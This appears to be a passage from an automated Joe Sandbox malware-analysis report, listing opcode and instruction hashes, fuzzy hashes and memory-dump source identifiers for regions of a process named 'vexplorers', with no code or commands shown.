                                                                    • Opcode ID: 1552c56bc324250107382885c56b86298b73d880dac6d42a01a7e20c87ea90f8
                                                                    • Instruction ID: 8323a66222cc04b59d954bc235171e448910f6c50fbbc43d62771c8d037f82cc
                                                                    • Opcode Fuzzy Hash: 1552c56bc324250107382885c56b86298b73d880dac6d42a01a7e20c87ea90f8
                                                                    • Instruction Fuzzy Hash: FD118231F00105DFEF159AF59811B6D3255AB9A315F204979D826DF341EB25DC8A8BC1
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.111694968331.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_150000_vexplorers.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 648ca7b325222bac4be57edbfc6eea42e286ecc51e678e353faaa406ad41a841
                                                                    • Instruction ID: 0dbc45a505a50ccbaa643b19566f99753c100fe218b862a3ef84f5885ac0f946
                                                                    • Opcode Fuzzy Hash: 648ca7b325222bac4be57edbfc6eea42e286ecc51e678e353faaa406ad41a841
                                                                    • Instruction Fuzzy Hash: CD112375F04241AFCF019BB85C446AE7FF5AF8D250F10056AE916D3340DB38C9168B81
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.111694968331.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_150000_vexplorers.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 53280cd23b4399b9d7cf03112e80831ae38f49c4c7b96180fedec1a72a7946ee
                                                                    • Instruction ID: ea9dea4fc8427d524f2243d243745b79f839826f9a4ccb42564d2fde0152b4a9
                                                                    • Opcode Fuzzy Hash: 53280cd23b4399b9d7cf03112e80831ae38f49c4c7b96180fedec1a72a7946ee
                                                                    • Instruction Fuzzy Hash: 29117071A00254DFCF12EFF988556AE7BF4EB89311B150479E825EF242E731DC8A8B91
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.111694968331.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_150000_vexplorers.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d88b5c4409789ef479b9e945f38acf5c8e8889071262604778b71b44b2fe7d5c
                                                                    • Instruction ID: f9f6f4cd17af17e019acb0ba2225451dcf66b4702358b35813598812e88910a8
                                                                    • Opcode Fuzzy Hash: d88b5c4409789ef479b9e945f38acf5c8e8889071262604778b71b44b2fe7d5c
                                                                    • Instruction Fuzzy Hash: 84014932A00645CBCF108678D8219DDB772DB8A331F144666EC25FB194DB31991C87A0
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.111694968331.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_150000_vexplorers.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 25689150a0a9973a7ff82d9779768d863804a856bfe55d9a10c1ba0ae7881d85
                                                                    • Instruction ID: 1cfcc6a5907557f8a21d7fe913906a829fad7d4c1cd0b3e462e3a09c49a14650
                                                                    • Opcode Fuzzy Hash: 25689150a0a9973a7ff82d9779768d863804a856bfe55d9a10c1ba0ae7881d85
                                                                    • Instruction Fuzzy Hash: FD012D31A10214DFCF22EFF984556AE7BF5EB89312B250479D825EF201E731DC458B91
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.111694284653.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_ad000_vexplorers.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c97d0ad33a1af318e67801cc8edb351f91f7a7a0364d3496a9776e72b477898c
                                                                    • Instruction ID: 4fbde024a1623b78ce2d5c529d1504faaf658f4afb612f058e110e6f8dcbacf5
                                                                    • Opcode Fuzzy Hash: c97d0ad33a1af318e67801cc8edb351f91f7a7a0364d3496a9776e72b477898c
                                                                    • Instruction Fuzzy Hash: B511D075504280DFDB11CF64D5C4B15BBA2FB49314F24CAAEE84A4B652C33AD84ACF52
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.111694968331.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_150000_vexplorers.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 19b2c8d4a2cada39255aaab97351ae2d1f4b1d78d55725211c207c294b2f0c1a
                                                                    • Instruction ID: f8e56cf6a2d75caa0ccfa01e6c3bbc5cb143fba81c4b5d02d4772a751f71bf3d
                                                                    • Opcode Fuzzy Hash: 19b2c8d4a2cada39255aaab97351ae2d1f4b1d78d55725211c207c294b2f0c1a
                                                                    • Instruction Fuzzy Hash: CF01AD70A00651AFDB04ABB888527BE7BE6EF44250F104569EA14DF292EB25DB1A8781
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.111694968331.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_150000_vexplorers.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9150c437e25c1634867386b43aec632e806cf11e624bf00ec1507ec87bd2f488
                                                                    • Instruction ID: a2eebe5e03842dec3dc2a494b4e25115d28fab50271e3fff6552ff9b869d9126
                                                                    • Opcode Fuzzy Hash: 9150c437e25c1634867386b43aec632e806cf11e624bf00ec1507ec87bd2f488
                                                                    • Instruction Fuzzy Hash: 1F110230C04228CBDF749AA4D5893ECB7B2BF1431EF141429D821AA1A5EB745CCDCB02
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.111733456309.000000003A900000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A900000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_3a900000_vexplorers.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ce8d56072fa0d8b7f4950332c9a75e40bfa777e659ff530a50d3f3f5f670bd9e
                                                                    • Instruction ID: 9447d1ecbe1a8c5304e357b1532514243adc86fc71aa5f49624ab92f81385c78
                                                                    • Opcode Fuzzy Hash: ce8d56072fa0d8b7f4950332c9a75e40bfa777e659ff530a50d3f3f5f670bd9e
                                                                    • Instruction Fuzzy Hash: 1E01D1313042009FC715AB3999A46AEB7DBEFC52AA715483DE41A8B742EF34DC068B91
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.111694968331.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_150000_vexplorers.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 802b0f7135f95118d6648c3b06e26fc0929de55282ae092f6755ddfc98087bf4
                                                                    • Instruction ID: 8abdc2a819bfcfc57a66063a352a60d1cec4bf9639aa33cadaef38e6ad27a9de
                                                                    • Opcode Fuzzy Hash: 802b0f7135f95118d6648c3b06e26fc0929de55282ae092f6755ddfc98087bf4
                                                                    • Instruction Fuzzy Hash: 80F01D30308F02CBFB241A659C3877626AFAB01747F254436AC32CD680DB59C8C9B662
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.111694968331.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_150000_vexplorers.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e04c478e96164fc998f90f050db0aaeedf1d878105c472a7cf23aac80661e0aa
                                                                    • Instruction ID: d75351559a235ebf3aba731561eff36a37df337a5123146a1eb739243691008c
                                                                    • Opcode Fuzzy Hash: e04c478e96164fc998f90f050db0aaeedf1d878105c472a7cf23aac80661e0aa
                                                                    • Instruction Fuzzy Hash: 9EF08C35B001188FDB10CBA9D840BDEB7B1FF88332F148165E529AB2D5C63499168BA0
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.111694968331.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_150000_vexplorers.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b8f42d45b4cb7d2aafe79d5e3f09189ea968d4a5c26c6043834fb3a67702e227
                                                                    • Instruction ID: 7711f5e2fcf93df0f8cb8b5798028ee730bd1850960f510b8ac63b73c34d2043
                                                                    • Opcode Fuzzy Hash: b8f42d45b4cb7d2aafe79d5e3f09189ea968d4a5c26c6043834fb3a67702e227
                                                                    • Instruction Fuzzy Hash: DE012C39B00504CFDB08DB74E959BAD37B2EF89355F114068E9069B3B0CB34AD46CB40
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.111694968331.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_150000_vexplorers.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8a397ea9ebdcc485960ce0c47942323734993b9a68f543797662388d31eafa31
                                                                    • Instruction ID: 0441e133ee55f2dc0777e7b384263a6a86d09459cbf2643f0503b5b7d35d77a7
                                                                    • Opcode Fuzzy Hash: 8a397ea9ebdcc485960ce0c47942323734993b9a68f543797662388d31eafa31
                                                                    • Instruction Fuzzy Hash: CAF0E575D0121AEFCF50EEBD98052EA7BB9EB04250F114A7AE855DB201E372C6168791
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.111733456309.000000003A900000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A900000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_3a900000_vexplorers.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cee1ce153d3cd88c0d349dd7381bbafe6050c63c2627a04a19b14d9d5463e97a
                                                                    • Instruction ID: b1d5373ffe0f38dc7bbf7b9f9bae19bd2dea54548d645454577fb82b4f196b28
                                                                    • Opcode Fuzzy Hash: cee1ce153d3cd88c0d349dd7381bbafe6050c63c2627a04a19b14d9d5463e97a
                                                                    • Instruction Fuzzy Hash: 7AE06872B01119ABDB1415B5E8048CEB77AEBC93A0B11483AD911F3241EA725815C7D0
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.111694968331.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_150000_vexplorers.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2202f58305ce3969053db4e85de1fba5861e356aff396b3fdc6e3389ecfe7712
                                                                    • Instruction ID: f395c36342bfa4cfbe8a5ee8ca414c0826cc384156493757261c64c95cf66874
                                                                    • Opcode Fuzzy Hash: 2202f58305ce3969053db4e85de1fba5861e356aff396b3fdc6e3389ecfe7712
                                                                    • Instruction Fuzzy Hash: 43E09A75E0021AEB8B50DAB998012AB7BF9AB04220F00883AE819E7200E330CA018BD1
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.111733456309.000000003A900000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A900000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_3a900000_vexplorers.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 82893f6d568608b2192f90fa3881928b9845d64aa76905b7e3e64d69363c09bd
                                                                    • Instruction ID: 9a5061c7987fc39e7d5b73fb5519a230d19528069a07f3c0152d0ac05f0ee319
                                                                    • Opcode Fuzzy Hash: 82893f6d568608b2192f90fa3881928b9845d64aa76905b7e3e64d69363c09bd
                                                                    • Instruction Fuzzy Hash: 3CE086B46067009FD361CB68D544B527BF9FF49310B81445BE44AD7A55D774F901CF90
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.111694968331.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_150000_vexplorers.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ad58be71ea432069c2649197dd5efa0355d01a8aa577b624ec2cda1fab45988d
                                                                    • Instruction ID: e5c858a72541f8cf9ace98778b7c7033deadbf6714a361b08b1385d30b81548b
                                                                    • Opcode Fuzzy Hash: ad58be71ea432069c2649197dd5efa0355d01a8aa577b624ec2cda1fab45988d
                                                                    • Instruction Fuzzy Hash: E4B0926004E3C10FC70303250C216C03F7008031A831F02D3D0849B0A3CA184618C312